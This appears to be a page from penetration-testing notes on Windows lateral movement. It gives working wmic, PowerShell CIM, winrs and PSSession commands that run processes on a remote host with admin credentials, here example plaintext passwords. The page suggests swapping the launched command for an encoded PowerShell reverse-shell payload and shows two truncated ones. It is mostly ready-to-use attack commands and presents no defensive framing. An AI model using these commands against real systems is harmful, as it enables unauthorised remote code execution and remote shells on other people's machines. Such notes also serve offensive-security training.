LOTL WMI and WinRM

User credentials of a local admin on the remote target is needed to create new processes

WMI

CMD test

wmic /node:192.168.1.50 /user:adot /password:Pwd process call create "calc"

Powershell test

$username = 'adot';
$password = 'Pwd';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.1.50 -Credential $credential -SessionOption $Options 
$command = 'calc';

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

We can change the $command variable to a powershell rev shell payload

$command = 'powershell -nop -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtE8AYgBqAGUAYwB0ACA';

WinRM

CMD

winrs -r:web01 -u:adot -p:Pwd  "cmd /c whoami"

winrs -r:web01 -u:adot -p:Pwd  "powershell -nop -e JABjAGwAaQBlAG4AdA"

Powershell

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName 192.168.1.50 -Credential $credential

Enter-PSSession 1
[192.168.1.50]: PS C:\Users\jen\Documents> pwned <3

PreviousOverpass the Hash NextPost-Compromise Attacks

Last updated 1 year ago